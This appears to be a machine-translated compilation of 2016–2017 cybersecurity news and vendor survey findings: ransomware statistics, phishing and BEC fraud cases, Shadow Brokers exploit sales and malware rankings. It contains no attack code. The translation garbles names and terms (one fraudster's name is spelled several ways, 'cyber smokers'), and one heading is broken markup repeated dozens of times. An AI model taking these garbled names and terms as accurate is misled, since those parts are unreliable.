Experts also note that Russia and the United States are world leaders in the field of cybersecurity. Having achieved certain successes in this market, the Russian Federation will be able to export products and services for protection against cyber threats abroad, they say.

Kaspersky Lab data

According to a Kaspersky Lab study involving more than 350 representatives of industrial organizations around the world, including Russia, over the past 12 months, every second industrial company in the world has experienced from one to five cyber incidents - they have affected critical infrastructures or automated process control systems (APCS) at these enterprises. Each company spent an average of $497 thousand to eliminate the consequences of these incidents that occurred during the year.

The survey also showed that the collision with cyber threats did not come as a surprise to industrial enterprises - three quarters of companies admit the likelihood of suffering from a cyber attack. Moreover, 83% of respondents consider themselves well prepared for the fact that any incident may occur in their industrial infrastructures.

Most of all today, companies fear the possibility of malware infection. And reality shows that this is not in vain - 53% of enterprises affected by incidents confirmed cases of collision with various malware. Moreover, about a third of companies (36%) were targeted. Thus, malware and well-planned targeted operations have become the dominant threats to industrial and critical infrastructures.

At the same time, the study showed that companies often underestimate internal threats, fearing risks from outside. Thus, 44% of organizations believe that their cybersecurity is likely to be threatened by any third parties, for example, suppliers. And 33% believe that ransomware poses the greatest danger to them. However, more often cyber incidents in industrial networks occur due to errors and unintentional actions of personnel - it was this factor that threatened almost a third (29%) of companies.

How a fraudster warmed up airlines by $32 million and sat down for 5 years

In June 2017, a fraudster was sentenced to almost five years in prison in the United States, who caused damage of $32 million to airlines and travel agencies. 32-year-old Cameroonian citizen Eric Donys Simeu pleaded guilty back in December 2016.^[33]

As follows from court documents, for a long time Simyu and his accomplices sent phishing emails on behalf of Travelport and SABRE - the largest operators of global distribution systems - to their main customers, including airlines and airline booking and selling agents. Victims were lured to a malicious site where they had to enter their logins and passwords. The attackers used them in order to gain access to the networks of the distribution systems themselves.

As a result, between July 2011 and September 2014, Simyu and his accomplices fraudulently ordered flights for more than two million dollars. These tickets were either resold exorbitantly to the side of residents of Western African countries, or gang members used them to travel for their own pleasure.

Simew was detained in September 2014 at Paris Charles de Gaulle Airport. As it turned out, by that time an international arrest warrant had already been issued for him. After 18 months in a French prison, Simya was extradited to the United States, where he appeared in court. The guilty plea provided him with a comparatively easy sentence: four years and ten months in prison and a refund of $162,146 to Travelport.

Fraud costs the world business billions of dollars annually, despite the fact that the methods of intruders do not shine with variety: in the scheme according to which Simya worked and for some reason his accomplices who remained unknown, there is nothing new, - said Dmitry Gvozdev, CEO of the Security Monitor company. - Simyu finally went to jail, however, if you think about it, they could not calculate it for three years, his accomplices remained unknown, the damage remains unrecoverable. In addition, one rogue fisher is a drop in the ocean. The key to effectively protecting against such fraud is regular training of users, primarily corporate workers, how to identify and counter attempts at phishing attacks.

Russian hackers have the opportunity for industrial espionage with NSA exploits

In May 2017, The Shadow Brokers announced that it plans to distribute all exploits and hacker tools only by subscription in the future. Previously, the group published them in public access. Now those who wish will have to pay about 20 thousand dollars a month - in the Zcash cryptocurrency.^[34]

Subscription, which The Shadow Brokers themselves call "Wine of Month Club" OH LORDY^[35]cost potential subscribers a very round amount: 100 ZEC per month. ZEC is Zcash's new cryptocurrency, launched in October 2016^[36]

"Brokers" indicate, however, that they can change the payment system at any time. By the end of May 2017, 100 Zcash is about $21 thousand. Those who entered the required amount and provided contact information will be sent links to the archive with exploits and the password to it.

As for the content of the June archive, the "brokers" do not disclose it. They only note that he will be interested in hackers, IT security companies, governments and OEMs. The July "sale" was also pre-announced, but what to include and what not, The Shadow Brokers did not decide.

The Shadow Brokers are yet to decide. Something valuable for someone, - write the members of the group in their "branded" broken English. -... The time when "I will show you mine, if you show yours first, ends. Nations see what happens when The Shadow Brokers show their first. That's the wrong question. The question to be asked is: "Can my organization afford not to be the first to access The Shadow Brokers archive?

The Shadow Brokers group is known exclusively as the distributor of hacker tools stolen from Equation, a group closely associated with the US National Security Agency. Most of these exploits target vulnerabilities in Microsoft products.

In 2016, The Shadow Brokers tried several times to cash in on its loot by putting exploits up for sale or trying to raise money through crowdfunding. In April 2017, The Shadow Brokers published in the public domain a password for archives with malicious tools that they had previously tried to sell, and then, on April 14, posted a new archive with many exploits for Windows, including ETERNALBLUE, DARKPULSAR and others.

The ETERNALBLUE exploit was soon used by the creators of the WannaCry ransomware worm, the spread of which has become a global epidemic. This is despite the fact that a month before the release, Microsoft released updates that fix all or most of the vulnerabilities targeted by NSA exploits.

The price is quite high, but it is possible that The Shadow Brokers plan will work, "says Dmitry Gvozdev, CEO of Security Monitor. - All interested parties have already had the opportunity to make sure that at the disposal of the group are really working and very dangerous tools. So the assumption that both governments and cybercriminals - including Russian ones - will agree to invest such large funds to obtain these weapons at their disposal. For cybersecurity in general, this does not mean anything good.

The largest cyber scheme in the financial market

On May 22, 2017, Ukrainian hacker Vadim Yermolovich was sentenced to 2.5 years in prison for participating in a criminal scheme that allowed attackers to earn more than $100 million. This is stated in the message of the US Department of Justice.

The 29-year-old Ukrainian, detained in 2014, was sentenced by the district judge of Newark (New Jersey, USA) Madeline Cox Arleo. Acting federal prosecutor William Fitzpatrick publicly spoke about the court verdict.

Vadim Ermolovich pleaded guilty to participating in a criminal conspiracy to hack computers and steal personal data. Fraudsters stole press releases from companies before their official publication and sold insider information to traders, who then used this data to make money on stocks.

Russian traders also participated in the fraud. They compiled lists of press releases and names of preferred companies for hackers. Among them are Caterpillar, Home Depot and Panera Bread.

According to the American authorities, hackers stole more than 150 thousand corporate messages intended for the media from the portals Business Wire, Marketwired and PR Newswire between February 2010 and August 2015. Cybercriminals earned about $100 million on this.

Reuters notes that we are talking about the largest known hacker scheme used to play in financial markets, and 29-year-old Vadim Ermolovich from Kyiv became the first member of this group to admit to committing crimes. Given this mitigating circumstance, the judge sentenced him to 30 months in prison.

The U.S. Securities and Exchange Commission has charged more than 40 people. The ten defendants - three hackers and seven traders - are facing criminal charges in New Jersey and New York. Five people confessed to the crimes.^[37]

Cyber ​ ​ drivers demand almost four times more ransom from victims

The average ransom size demanded by cyber scientists from their victims grew by 266% in 2016. This was reported in the annual Internet Security Threat Report, prepared by Symantec information security company.^[38]

In 2015, attackers encrypting data on a computer using malware (ransomware) and demanding money to unlock them, on average, asked users for $294. However, in 2016, the amount increased to $1,077, experts found out.

Experts cite the willingness of victims to pay money as the main reason for the rapidly growing appetites of cyber smokers. As a rule, criminals demand a ransom in cryptocurrency, since this ensures anonymity and irrevocability of transactions. According to Symantec, 34% of users in the world, faced with ransomware, will agree to transfer the amount named by him. However, the ransom does not guarantee at all that the user will receive his data back. Only 47% of victims after transferring money restore access to encrypted files, experts warn.

Meanwhile, in the United States, victims of cyber fraudsters are even more willing to pay a ransom - 64% of users agree to the demands of criminals. Symantec believes that this is why the United States leads in the number of registered cyber powers. In 2016, this country accounted for 34% of the total number of recorded ransomware infections. Also in the top three anti-leaders are Japan and Italy with indicators of 9% and 7%. Statistics indicate that hackers are more likely to attack developed countries with stable economies.

Russia was also on the list of the ten most popular countries among cybercriminals. According to Symantec, last year the Russian Federation accounted for 3% of cases of cyber power. The same indicator - 3% - was in Holland, Germany, Australia and Great Britain. In addition, Canada and India have 4% each.

Interpol: Cyber fraud in West Africa has become a source of wealth and object of worship

In March 2017, it became known that over the past three years, fraudsters from West Africa have caused damage to Western businesses in the amount of $3 billion. This is stated in the results of a study conducted by experts from Interpol and Trend Micro.^[39]

Earnings from fraudulent schemes in West African countries have become so popular that, for example, in Ghana, Internet fraud even acquired its own patron spirit.

As noted in the study, attackers in recent years have most often used a scheme called Business Email Compromise (BEC), a compromise of business mail. Attackers using such schemes send fake, but very reliable-looking bills for payment, as well as fake memos to their potential victims in the hope that any of the company's financially responsible employees will bite and transfer money to the accounts of fraudsters.

Sometimes these messages contain attachments with keyloggers; in a successful coincidence, malefactors gain access to the bank accounts of their victims and can transfer money directly.

Between October 2013 and May 2016, fraudsters who used BEC schemes stole more than three billion dollars from Western companies. In the United States alone, commercial companies lost almost one billion dollars during this period. Sometimes - but, alas, not always - fraudsters manage to cancel the payments, and return the funds back.

Western African cyber fraudsters are increasingly using more complex schemes than before, conducting more thoughtful operations and using more sophisticated business models; the emphasis is shifting toward the BEC and tax fraud in particular, the report said. Thanks to experience and ingenuity in the field of social engineering, as well as rich malicious tools (keyloggers, remote administration tools, ransomware and antivirus bypass tools), Western African cybercriminals steal a large amount of financial funds from individual users and commercial companies around the world.

The reason why West Africa has become a hotbed of cyber fraud is quite transparent: almost half of university graduates there cannot find work for at least a year after graduation. Participation in cyber fraud schemes turns out to be a very attractive alternative to poverty and hunger.

It is mainly from such young and educated, but unable to get a job, that "brigades" of cyber fraudsters are formed. Interpol and Trend Micro researchers have identified two large groupings operating in West Africa.

The first is the so-called Yahoo! Boys, which deals mainly with traditional types of fraud, such as, for example, "Nigerian" spam. Beyond that, Yahoo! Boys are actively wading into marriage scams and spam asking them to urgently send money to a traveler allegedly in trouble abroad.

Its name is Yahoo! The boys earned thanks to the fact that until very recently they coordinated their actions through the chat of the Yahoo portal. Typical representatives of this group are young people in their twenties who love to brag about their wealth on social networks. Despite the fact that their methods of fraud are quite simple and banal, they still bring them considerable income.

Criminals of a higher level (Next Level Criminals) pose a much greater threat.

Their professional level is very high. Before conducting their operations, they actively collect information from all possible sources about potential victims (mainly of a financial nature), and thereby ensure increased effectiveness to their attacks.

In addition, these scammers control a vast network of "money mules," people who, for a small commission, make prompt cashing of stolen funds.

Attackers of this kind literally earn billions, although, unlike Yahoo! Boys, they choose not to advertise their fortunes. Interpol occasionally tries to fight these criminals, but these efforts rarely lead to success. In only 30% of cases when data is transmitted to local police, the offender is arrested.

The Trend Micro report notes that the criminal culture of West Africa has formed a certain mentality that justifies fraud; there are opinions that this culture even encourages such actions, equating fraud with fooling victims, especially foreigners. The most obvious example of this is "sakawa," a ritualized practice of online fraud in Ghana. Sakawa practitioners believe that the highest essence gives fraudsters protection and luck in their activities.

Mythologized thinking and the flair of mystery are characteristic of the hacker environment, as dealing with secret data and other people's secrets, says Dmitry Gvozdev, CEO of Security Monitor. - And in the case of African hackers, often not very qualified and using the ready-made developments of their European and American colleagues, the appearance of such a cargo cult does not seem surprising, especially if this information is not a very early April Fools' joke.

Danish deputies were afraid to take gadgets on a business trip to Russia

In March 2017, it became known that Danish deputies would come to Russia without personal mobile devices and laptops due to fears of hacking this electronics.

On his Facebook page, former Danish Foreign Minister Martin Lidegaard, representing the Social Liberal Party, wrote the following:

Goodbye, smartphone. The Foreign Policy Committee recommended that we not take gadgets on a business trip to Russia for security reasons.

Social Democrat party member Nick Haekkerup on his Facebook page also lamented that he is forced to leave electronic devices such as iPhones and iPads at home, so he will have to live for a week without the Internet, email and social networks.

However, the deputies were not left without cellular communications. Lidegor posted a photo of an old Nokia push-button phone, which he was allowed to take with him to Russia. The plans of the delegation of Danish parliamentarians in the Russian Federation were not reported.

Danish ministries were repeatedly hacked in 2015-2016, Reuters reported, citing a report from the Danish Defense Ministry's cybersecurity unit. Foreign state-sponsored hacking groups were behind the attacks, according to authorities. Although the report does not name the specific country responsible for the cyber attacks, it notes that Russia and China have extensive cyber espionage capabilities.

The Danish defence ministry's cybersecurity unit also said the threat of cybercrime against local authorities and companies remained "very high." Martin Lidegor said earlier that the European Union should prepare for a hybrid war with Russia.

In 2016, intelligence services USA accused Russia of hacker attacks aimed at increasing votes in favor of the Republican Donald Trump (Donald Trump) during the presidential election. Moscow denies the claims.^[40]

Positive Technologies: In 2017, the number of cyber attacks on banks will increase by a third

On January 27, 2017, Positive Technologies published findings on 2016 information security trends that will affect the future of the entire industry. The basis for the assessment was attack statistics and data obtained as a result of implementation projects.

2016

• Data loss is no better than money loss: the result of most 2016 computer attacks − sensitive information leaks.
• Targeted attacks: 62% of cyber attacks of the year were targeted. The main method of penetration is targeted phishing. The average time of presence of attackers in the system is up to 3 years. Only 10% of attacks are detected by the victims themselves.
• Financial systems: attackers use simple methods and legal software to disguise, and the attacks themselves are prepared more carefully. A 30% increase in attacks on financial institutions is expected. The main reason is reactive approaches to information security and refusal to regularly analyze security. Hackers, seeing "easy money," begin to replicate successful attacks.
• Ransom at the highest level: large companies are extorted by ransomware Trojans, DDoS attacks and website vulnerabilities. The method of extortion, when hackers demand a ransom for information about vulnerabilities found in companies' web applications (the so-called bug poaching), has already become widespread. The listed extortion techniques will develop in 2017.
• Power under attack: Among the industrial control systems available via the Internet, building automation and power management systems are leading the way. Almost half of the vulnerabilities found in 2016 have a high degree of risk.
• Between ACS and the Internet of Things. Control automation has become available to mass users without the necessary security measures. It is possible that the situation in the field of the Internet of Things may require regulation of the minimum level of security of devices - if manufacturers themselves do not show consciousness in this matter, then the state will join, which will deal with the certification and standardization of such products.
• Government sites are the most common target of web attacks. The most popular attacks are "SQL Statement Injection" and "Path Traversal."
• Don't believe satellite navigation. The implementation of attacks with the substitution of a GPS signal has become available to everyone.
• You are managed by Android. As smartphones become the main "remote control" of modern life, the attention of cybercriminals to devices based on Android OS continues unabated. The "sphere of influence" of mobile applications is expanding: applications for managing household appliances or for games with augmented reality give attackers new opportunities to interfere in the lives of their victims.
• Attacks through hardware platform vulnerabilities. Legal hardware capabilities provided by the manufacturers themselves can be used for other purposes. Hardware attacks are terrible because they often do not depend on the OS and cannot be promptly prevented.

The expected growth of attacks on financial systems, government sites and corporations using simple technologies (phishing, legal software) speaks of the need to use modern means of monitoring events and incident investigation (SIEM), machine learning-based attack detection systems (WAF), and also requires increased awareness of employees^[41]

The weak security of industrial control systems (APCS), combined with the deterioration of the geopolitical situation, may lead in 2017 to an increase in the number of cyber attacks on industrial facilities, especially in the energy sector. The use of complex passwords and disconnection of APCS components from the Internet can reduce risks, however, more serious measures include regular security audits, timely update of vulnerable software and the use of protective equipment "tailored" to the specifics of specific APCS.

Mobile users are encouraged to pay more attention to application security and use settings to restrict access to personal information and potentially dangerous actions.

Attacks on Internet of Things showed that users are often deprived of the ability to independently control the security of new devices. To reduce risks, it is necessary that the vendors or service providers themselves Internet of Things conduct special tests of the security of devices. Obliging them to this can be either additional rules of state regulators, or self-regulation based on the threat of loss of reputation after major attacks. By the way, experts predict that in 2017, attackers will expand the range of IoT devices used: at risk - "smart" household appliances (up to kettles and refrigerators).

2016

Kaspersky Cybersecurity Index

Kaspersky Kaspersky"" announced in April 2017 a recorded decrease in the share of Russian users exposed to cyber threats and neglecting computer protection. This is evidenced by the updated information security Kaspersky Cybersecurity Index, which the company calculated in the second half of 2016.

The first Kaspersky Cybersecurity Index was published in September 2016 - it contained data for the first half of 2016. The second wave of user surveys, on the basis of the answers of which the index is calculated, allowed Kaspersky Lab not only to update the indicators, but also to track changes in user behavior.

The index is based on three indicators that reflect the attitude of respondents to cyber threats: Unconcerned - the proportion of users who do not believe that they can become victims of cybercriminals, Unprotected - the number of users who did not install protection on their computers, tablets and smartphones, and Affected - the percentage of users who became victims of cybercriminals.

Thus, the cybersecurity index in Russia for the second half of 2016 looks like this: 83% -37% -33% (Unconcerned-Unprotected-Affected). In other words, the vast majority of Russian users (83%) do not believe that cyber threats can affect their lives in any way. By the way, this figure has not changed since the first half of 2016. More than a third of users (37%) still neglect security programs; when compiling the first index, there were slightly more of them - 39%. Finally, 33% of Russians surveyed admitted that they had encountered cyber threats. This indicator has changed most noticeably compared to the first half of 2016 - then 42% of Russian users were victims of cybercriminals.

For comparison, the global cybersecurity index looks like this: 74% -39% -29%. That is, those who are not worried about cyber threats and affected by them are on average less in the world than in Russia.

In addition to the information security index itself, other data can also be found on the http://index.kaspersky.com website that reflect the characteristics of user behavior in different countries of the world. For example, statistics indicate that Russian users have begun to communicate noticeably more using instant messengers (86% versus 69% in the first wave), manage their finances through online banking systems (80% versus 56%) and store their personal data in the cloud (51% versus 24%).

The Kaspersky Cybersecurity Index is based on data obtained from thousands of users around the world as part of large-scale research conducted by Kaspersky Lab in conjunction with B2B International. The latest wave of the survey covered 17,377 users in 28 countries around the world, including Russia.

2016 broke the record for the number of cyber threats

On March 1, 2017, Trend Micro Incorporated defined 2016 as the year of online extortion - the number of cyber threats reached its highest level on record, and the company's losses reached $1 billion globally.

Trend Micro published its annual cybersecurity report for 2016 on March 1, 2017, entitled 2016 Security Roundup: A Record Year for Enterprise Threats. According to this document, ransomware and corporate mail fraud (BEC) have become popular with cybercriminals who are looking for ways to carry out corporate online extortion. The number of ransomware families increased by 752%.

Trend Micro and Zero Day Initiative (ZDI) discovered 765 vulnerabilities, 678 of them through Bug Bounty, a ZDI program.

Compared to the number of vulnerabilities discovered by Trend Micro and ZDI in 2015, Apple products grew by 145%, while Microsoft decreased by 47%. The use of vulnerabilities in exploit sets decreased by 71%, which is partly due to the arrest in June 2016 of members of the hacker group behind the creation of the Angler exploit set.

As cyber threats constantly developed and became more complex, attackers shifted the focus of their attacks from ordinary users to those who have money - that is, to corporations. In 2016, we witnessed cybercriminals stealing funds from companies and organizations for financial gain, and we have no hope that this trend will change. The purpose of this study is to increase the awareness of companies about those tactics that are actively used by attackers to compromise corporate data, as well as help organizations build their defense strategy in such a way as to always stay one step ahead of attackers and resist potential attacks. EdCabrera, Head of Information Security at Trend Micro

Trend Micro Smart Protection Network technology blocked more than 81 billion threats in 2016, up 56% from 2015. In the second half of 2016, on average, more than 3 thousand attacks per second were blocked against the company's customers. During this period, 75 billion threats were received through e-mail.

Ernst & Young: Willingness to defend grows and invest doesn't

On December 23, 2016, EY announced the readiness of world-class companies to resist cyber attacks and insufficient investments in the development of areas for combating cybercrime, the absence of plans to eliminate the negative consequences of such attacks.

These conclusions are based on the results of the study in the field of information security "Path to cyber resilience: Sense, resist, react" for 2016.

1,735 companies from different countries and industries took part in the survey. According to the study, half of the respondents (50%) are able, in their opinion, to detect carefully prepared cyber attacks - the highest level of confidence since 2013 - through investments in cyber threat detection tools to predict the consequences of an attack, as well as through the creation of continuous monitoring mechanisms, the operation of operational information security centers (Security Operation Center, SOC) and active protection mechanisms.

Despite the mentioned investments, 86% of respondents admit that their cybersecurity service does not fully meet the needs of the organization.

Almost two-thirds (64%) of respondents do not have special programs for collecting and analyzing information about cyber threats, or are limited to non-systemic activities in this area. As for the identification of vulnerabilities, more than half (55%) do not have the appropriate technical means and capabilities, or such means are used irregularly, from case to case. 44% do not have an information security operations center to conduct continuous monitoring of cyber attacks and potential threats.

More than half (57%) of respondents answered positively to the question about incidents in the company, in the field of cybersecurity. Almost half (48%) consider outdated controls, features of the information security architecture to be the greatest vulnerability of their organization. In 2015, 34% of respondents said this.

Organizations have done a great job of preparing protection against cyber attacks, but cybercriminals are no less quick to come up with new tricks. In this regard, organizations should pay more attention to the development of skills and capabilities to counter cyber attacks. They should also reflect not only on protection and security, but also on resilience to cyber threats, an approach that will ensure that cybersecurity incidents are prepared and fully addressed across the organization. Companies should have a plan of action in the event of a cyber attack, be ready to quickly eliminate the consequences and restore the normal operation of the organization. Otherwise, they put their customers, employees, suppliers and ultimately their own future at risk. Paul van Kessel, Head of EY Cybersecurity Consulting Services International

Respondents are concerned about cybersecurity issues:

• increased risks as a result of the actions of employees committed out of negligence or ignorance (55% compared to 44% in 2015),
• unauthorized access to data (54% compared to 32% in 2015).

The main limitations that prevent the operation of the information security function:

• underfunding (61% compared to 62% in 2015);
• lack or absence of qualified personnel (56% compared to 57% in 2015);
• lack of understanding or support from the organization's management (32% unchanged by 2015).

Despite the comprehensive nature of the modern digital ecosystem, the study found:

• 62% of organizations consider it unlikely to increase cybersecurity spending as a result of an attack that did not cause visible damage to operating activities
• 58% indicated a low probability of increased cybersecurity spending as a result of a competitor's cyberattack
• 68% consider it unlikely to increase their cybersecurity spending as a result of a supplier cyberattack
• almost half of respondents (48%) during the first week after the attack will not inform customers whose activities the attack could affect if a cyber attack clearly led to data compromise
• 42% of organizations do not have an agreed engagement strategy or an action plan in case of a serious attack.

Organizations are facing an increasing number of devices connecting to their digital ecosystems. Almost three quarters (73%) of the organizations surveyed are concerned about non-compliance by owners of mobile devices (tablets, smartphones, laptops) with the rules for their use, lack of awareness of users about possible risks and consequences.

Half of respondents (50%) saw the main risk of increasing use of mobile devices in the possibility of their loss.

Internet propaganda as part of significant cyber threats of 2017

On December 19, 2016, Trend Micro, publishing its forecast for 2017, put Internet propaganda among the main cyber threats, without diminishing the impact of Internet of Things vulnerabilities and cyber attacks.

According to the company's experts, in 2017, with the development of technologies, cybercriminals also entered other frontiers. In 2016, information security experts noted a new round of improvements in cyber attacks and the emergence of a variety of targets for them^[42].

We predict the emergence of new methods of attacks on large corporations, the expansion of online extortion tactics, which will affect an increasing range of devices, as well as the use of cyber propaganda methods to manipulate public opinion. Raimund Guinez, chief technology officer at Japanese company Trend Micro

As of December 2016, 46% of the population of different countries receives information from Internet sources. With the growth of this indicator, the threat of the impact of cyber propaganda is growing, which means the automatic generation of information traffic aimed at Internet users, the emergence of a large number of false news materials in social networks.

Examples of manipulations of this kind are false news that appeared Facebook during the presidential election in. USA It was on the social network that users learned that Pope Francis supported Donald Trump, the "news" about the death of an agent FBI who was investigating the Democratic candidate. Hillary Clinton The US President Barack Obama noted the likelihood of the influence of this news on the course of the presidential election.

At the end of November Facebook 2016, she announced the start of a plan to combat fake news. Among the measures are improving the algorithm for determining the reliability of news material, improving interaction with users who, for their part, report inaccurate information and contacting third parties and organizations for expert assessment.

Panda Security: 2017 forecast

On December 15, 2016, Panda Security published a malicious activity forecast for 2017. Characteristic features of the coming year: a decrease in the number of new malware, a higher professional level of attacks.

Cybercrimes

Cyber ​ ​ criminals focus their efforts on those attacks that can give them huge profits, using the most effective techniques and increasing the professional level of their operations so that it is faster and easier to "make" money.

Encoders

Trojans will be the focus when considering information security issues. They will absorb other, traditional data theft attacks. The desire for profit is the main motivation of cyber criminals, and ransomware is the easiest and most effective way to achieve these goals. Something will remain unchanged: victims of such threats will have to decide whether to pay ransom to criminals or not to recover data. In making the decision, Panda Security calls for consideration - payment of the ransom does not guarantee the complete recovery of stolen data.

Companies

The number of attacks directed against companies will grow as these attacks are increasingly improved. Companies have already become a primary target for cyber criminals, because the information they hold is more valuable than that available to individuals.

[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|[[Internet of Things (IoT)|Internet of Things (IoT)]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

The company sees the Internet of Things (IoT) as another nightmare for information security services. The technological revolution has led to complete integration into the network of small devices that can turn into points that allow hackers to penetrate corporate networks.

DDoS-attacks

The largest DDoS attacks were carried out in the last months of 2016, the company said. These attacks are carried out by botnets of thousands of infected IoT devices (IP cameras, routers, etc.). In 2017, the number of such attacks will increase.

Mobile phones

It will be easier for cybercriminals to focus on one operating system for maximum profits. Android users are expected to have a difficult and dangerous 12 months.

Cyber wars

The unstable situation in the field of international relations can lead to severe and serious consequences in the field of cybersecurity. Governments across countries are seeking access to large amounts of information (at a time when encryption is becoming more popular), and intelligence agencies will be even more interested in obtaining information that could benefit their countries' industries. Such a global trend could hamper data-sharing initiatives in 2018.

PandaLabs: Cybersecurity. Forecasts for 2017

IBM and Ponemon Institute study: Companies still not ready to withstand cyber attacks

The company IBM Ponemon Institute published in November the results of a global study of organizations' resistance to cyber attacks called the Cyber ​ ​ Resilient Organization. According to the study, only 32% of IT and security professionals believe that their companies have a high level of cyber defense. In 2015, this figure was 35%. In addition, 66% of respondents to the study in 2016 note that their organizations are not ready for recovery after the cyber attacks^[43]

The problems associated with incident response (Incident Response), as the study shows for the second year in a row, are the main obstacle in ensuring the resilience of organizations to cybersecurity threats. 75% of respondents said that their companies lack a Cyber ​ ​ Security Incident Response Plan. In those organizations where there is such a plan, 52% of respondents have not revised or updated the document since its adoption, or, moreover, such a procedure is not provided for in the company. At the same time, 41% of the study participants noted that over the past 12 months, the time required to resolve a cyber incident has increased. 31% of respondents said that this figure had decreased.

"Research on enterprise resilience to cybersecurity threats shows that in 2016, organizations around the world are still not ready to respond and neutralize incidents," said John Bruce, head and co-founder of Resilient, an IBM company. "Security leaders can make significant improvements by making incident response a top priority and focusing on planning, preparing and gathering information."

According to respondents, the Incident Response Platform is one of the most effective security technologies that helps organizations counter cyber attacks, along with identity and authentication management, detection and anti-hacking systems.

The study also identified typical problems that prevent an increase in the level of cybersecurity of organizations. A majority of survey participants (66%) believe that insufficient planning and low readiness are the main barriers to increasing the resilience of enterprises to cyber threats. Respondents also point out that the complexity of IT and business processes is growing faster than the ability to prevent, detect and respond to cyber attacks, leaving companies vulnerable. This year, 46% of the study participants indicated the increased complexity of IT processes as the main obstacle to building reliable business information protection - the indicator increased from 36% according to the results of the 2015 study. 52% of respondents said that the complexity of business processes is a significant barrier, compared with 47% in 2015.

Key findings of the study:

Companies are exposed to frequent and successful cyber attacks

• More than half of respondents (53%) have been affected by at least one data breach in the past two years
• 74% of respondents said that over the past year they have faced cyber threats caused by the human factor
• Assessing the past two years, 74% of respondents said they were subjected to numerous hacker attacks, and 64% were repeatedly compromised by phishing

Organizations cannot run continuously and recover quickly from attacks

• 68% believe that their organizations are not able to withstand cyber attacks
• 66% are not sure that their company can effectively recover from the attack

The biggest barrier is a lack of planning and preparation

• Only 25% use an incident response plan. 23% did not accept such a plan at all
• Only 14% of respondents revise incident response plans more than once a year
• 66% call lack of planning the biggest barrier preventing their organization from becoming resistant to cyber attacks

The ability to respond to cyber attacks has not significantly improved

• 48% believe that the resistance to cyberattacks of their organization has decreased (4%) or has not improved (44%) over the past 12 months
• 41% of respondents believe that the time to eliminate a cybersecurity incident has increased or increased significantly, while 31% said that it has decreased or decreased significantly

Check Point noted a 5% increase in cyber attacks and malware

The team of Check Point researchers found that both the number of malicious families and the number of attacks increased by 5%. The volume of attacks on business in October reached its peak, compared with all previous months of 2016. The number of attacks with the Locky ransomware continues to grow, so in October it moves from third to second place among the most commonly used types of malware. The reason for the popularity of Locky is the constant appearance of its modifications and the distribution mechanism mainly through spam mailing. The creators of Locky change the type of files used to download the ransomware (doc, xls and wsf files), as well as make significant structural changes to spam emails. Ransomware itself is not exceptional, but cybercriminals take a long time to infect as many computers as possible. The Zeus banking Trojan is also returning to the top 3.

1. ↔ Conficker - Used in 17% of reported attacks. A worm that provides remote execution of operations and loading malicious. ON The infected computer is controlled by a bot that seeks instructions from its command server.

2. ↑ Locky - Ransomware, which appeared in February 2016. It is distributed mainly through spam emails containing an infected Word or Zip file that downloads and installs malware that encrypts user files. Registered in October in 5% of known attacks.

3. Zeus ↑ - Also noted in 5% of detected attacks. A Trojan that attacks Windows platforms and is often used to steal bank information by seizing entered credentials (formgrabber) and keylogging

The number of attacks on Russia in October significantly decreased, which allowed it to drop from 52 to 101 places. Attacks on companies in the country were carried out using malware such as InstalleRex, Conficker, Kotetaur, Ramnit, Cryptoload, Dorkbot, Cryptowall, Locky, Bancos and Sality. Botswana, Uganda and Zambia were the most attacked last month, and Uruguay, Argentina and the Dominican Republic were the least recorded attacks.

Mobile malware continues to expose businesses to significant danger: 15 out of 200 types of malware attack mobile devices. Also for the past seven months, HummingBad, the Android malware, has remained the most used for attacks on mobile devices. The three most commonly used types of mobile threats in October are:

1. ↔ HummingBad - Android malware, which, using a reboot-resistant rootkit, installs fraudulent applications and, with minor modifications, can show additional malicious activity, including installing software keyloggers, stealing credentials and bypassing encrypted email containers used by companies.

2. ↔ Triada - Modular backdoor for Android, which gives increased privileges to downloaded malware, as it helps them infiltrate system processes. Triada was also seen spoofing URLs loaded in the browser.

3. ↑ XcodeGhost - Compromised version of the iOS Xcode developer platform. This unofficial version of Xcode has been modified so that it can inject malicious code into an application that is designed and compiled with it. The embedded code sends information about the application to the command server, allowing the infected application to read data from the device clipboard.

"The fact that the top 10 malware has remained unchanged since September allows us to assume that cybercriminals are happy with their actions. And for companies, it's a signal that they need to respond proactively to protect their critical business assets. The effectiveness of programs such as Conficker also suggests that companies are not yet using the necessary level of protection, "comments Vasily Diaghilev, head of Check Point Software Technologies. - To protect yourself, businesses need a comprehensive approach and measures of advanced protection of networks, endpoints and mobile devices to stop malware even before infection. This is possible with solutions such as Check Point's SandBlast™ Zero-Day Protection and Mobile Threat Prevention, which are capable of countering the latest threats. "

Fortinet on cybersecurity trends

Fortinet released six forecasts conducted by FortiGuard Labs threat research specialists regarding the development of threats in 2017. These forecasts highlight the strategies and ways that Fortinet researchers believe cybercriminals will use in the near future. The scale of the potential negative consequences of cyber attacks for the global virtual economy has also been described.

